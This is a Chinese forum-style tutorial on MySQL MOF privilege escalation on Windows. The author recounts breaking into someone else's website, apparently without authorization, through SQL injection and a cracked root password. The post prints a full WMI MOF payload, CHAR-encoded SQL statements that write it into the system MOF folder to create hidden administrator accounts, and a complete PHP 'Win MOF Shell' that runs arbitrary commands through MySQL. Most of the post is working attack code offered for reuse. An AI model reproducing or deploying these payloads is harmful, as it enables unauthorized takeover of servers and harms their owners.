今天再拿一個站的時候遇到了很多問題,拿站的過程就不說了,其中要用到mof提權,不管能不能提下,我進行一個mof提權的科普
這里我綜合各類mof提權進行了 綜合
首先說一下,無shell情況下的mysql遠程mof提權利用方法詳解
就是你注入拿到了數據庫的root賬號密碼,直接進行
掃到一個站的注入
在havij中得到mysql數據庫中mysql庫保存的數據庫密碼:
有時候發現1.15版的還是最好用,最穩定,雖然速度慢了一點。
照樣放到壇子里讓機油破了
感謝Mr.Lu。順便吐槽下,cmd5連個root都要收費。。。
在等着密碼破解出來的時候順便nmap了一下
意外發現端口改到了1126,給后面省下了不少時間。
照常外連試試
上個帖子里面有基友問這個軟件是什么,我用的是navicat,感覺很好用的
現在的常規思路就是得到絕對路徑,寫一個小馬,再進一步滲透。
但是網站上面暴不出路徑,看看mysql的路徑
用select @@basedir;命令可以看到;
網站的路徑大概差不多了,懶得一個一個試了,最近mof提權挺火的,上次失敗了一次,這次再來試試好了。
Mof的科普文很多,
mof文件內容為:
#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{ EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{ Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; };instance of __FilterToConsumerBinding{ Consumer = $Consumer; Filter = $EventFilter;};
由於沒有馬,不能按照網盤里面說的先傳一個mof上去,我就直接一次性寫入。
先是試了試直接將原來的語句寫入,提示失敗,原因就是語句里面很多";回車"之類的符號。
然后就想轉化為16進制或者asc碼這樣。
先試了16進制。
等了老半天什么還是登陸不上去,就放棄了,改用asc碼,用的sql語句為:
SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
這時候才意識到一個問題,上面的語句只添加了用戶,忘了提升為管理員了。。。
好吧,重新寫一遍mof
select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
好了,這樣就順利登進去了;
改天研究一下一次性完成添加管理員試試
現在默認它還是會過5s添加一次用戶,解決方法就是:
第一 net stop winmgmt 停止服務,
第二 刪除文件夾:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 啟動服務
還有其他方法在網盤的文件里面有寫。
一路看起來挺順利的,是因為上次研究過這個。這次寫的詳細點了。
第二種
首先呢先謝謝米爺在我弄這個的時候把我罵開竅了- -。
不多說了~。~像名稱一樣哈~
首先呢是朋友扔我一shell
他提權差就給咱了,簡單的看了下,是php腳本的,一看php腳本就肯定帶有,mysql。
就在網站目錄看了下data文件夾習慣性的~
運氣不錯。Root。
居然知道是這東西,上大馬。(不知道利用菜刀)
OK回顯成功。
5.0.67不用說都知道是什么了,這版本基本上udf都可以秒的,但畢竟這里說的是mof所以就用mof提吧。
先找個可寫路徑。
C盤可以,運氣不錯。
然后在上傳路徑傳個我們的mof文件
代碼如下:
#pragmanamespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as$Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exenet user user$ sword /add & net localgroup administrators user$ /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
生成的賬號:user$ 密碼為:sword
這段代碼可自行修改。
接着呢執行命令:selectload_file('C:\\RECYCLER\\xx.mof') into dumpfile 'c:/windows/system32/wbem/mof/xx.mof';
OK.。執行命令完成。
由於權限設置無法直接查詢管理員。登陸下就知道了。
好了mof提權就這樣。
謝謝觀看。
Ps:由於當時提的時候截的幾張圖,后來管理員把mof的漏洞修復了。所以服務器沒了。就這樣~
綜合一下
還可直接使用mof馬進行提權
但是我經常被殺
下面貼出代碼,直接保存mof.php,即可
運行的時候點read,多運行幾次 ,因為read沒有回顯是沒運行成功,如果出現錯誤他會,有回顯的
<?php$path="c:/windows/system32/canimei";session_start();if(!empty($_POST['submit'])){setcookie("connect");setcookie("connect[host]",$_POST['host']);setcookie("connect[user]",$_POST['user']);setcookie("connect[pass]",$_POST['pass']);setcookie("connect[dbname]",$_POST['dbname']);echo "<script>location.href='?action=connect'</script>";}if(empty($_GET["action"])){?><html><head><title>Win MOF Shell</title></head><body><formaction="?action=connect"method="post">Host:<inputtype="text"name="host"value="192.168.200.144:3306"><br/>User:<inputtype="text"name="user"value="root"><br/>Pass:<inputtype="password"name="pass"value="toor"><br/>DB:<inputtype="text"name="dbname"value="mysql"><br/><inputtype="submit"name="submit"value="Submit"><br/></form></body></html><?phpexit;}if($_GET[action]=='connect'){$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])ordie('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>";echo "Cmd:";echo "<input type='text' name='cmd' value='$strCmd'?>";echo "<br>";echo "<br>";echo "<inputtype='submit'value='Exploit'>";echo "</form>";echo "<formaction=''method='post'>";echo "<inputtype='hidden'name='flag'value='flag'>";echo "<inputtype='submit'value=' Read '>";echo "</form>";if (isset($_POST['cmd'])){$strCmd=$_POST['cmd'];$cmdshell='cmd /c '.$strCmd.'>'.$path;$mofname="c:/windows/system32/wbem/mof/system.mof";$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")instance of __EventFilter as \$EventFilter{ EventNamespace = \"Root\\\\\\\\Cimv2\"; Name = \"filtP2\"; Query = \"Select * From __InstanceModificationEvent \" \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" \"And TargetInstance.Second = 5\"; QueryLanguage = \"WQL\";};instance of ActiveScriptEventConsumer as \$Consumer{ Name = \"consPCSV2\"; ScriptingEngine = \"JScript\"; ScriptText = \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; };instance of __FilterToConsumerBinding{ Consumer = \$Consumer; Filter = \$EventFilter;};";mysql_select_db($_COOKIE["connect"]["dbname"],$conn);$sql1="select '$payload' into dumpfile '$mofname';";if(mysql_query($sql1)) echo "<hr>Execute Successful!<br> Please click the read button to check the result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); mysql_close($conn);}if(isset($_POST['flag'])){ $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); $sql2="select load_file(\"".$path."\");"; $result2=mysql_query($sql2); $num=mysql_num_rows($result2); while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { echo "<hr/>"; echo '<pre>'. $row[0].'</pre>'; } mysql_close($conn);}}?>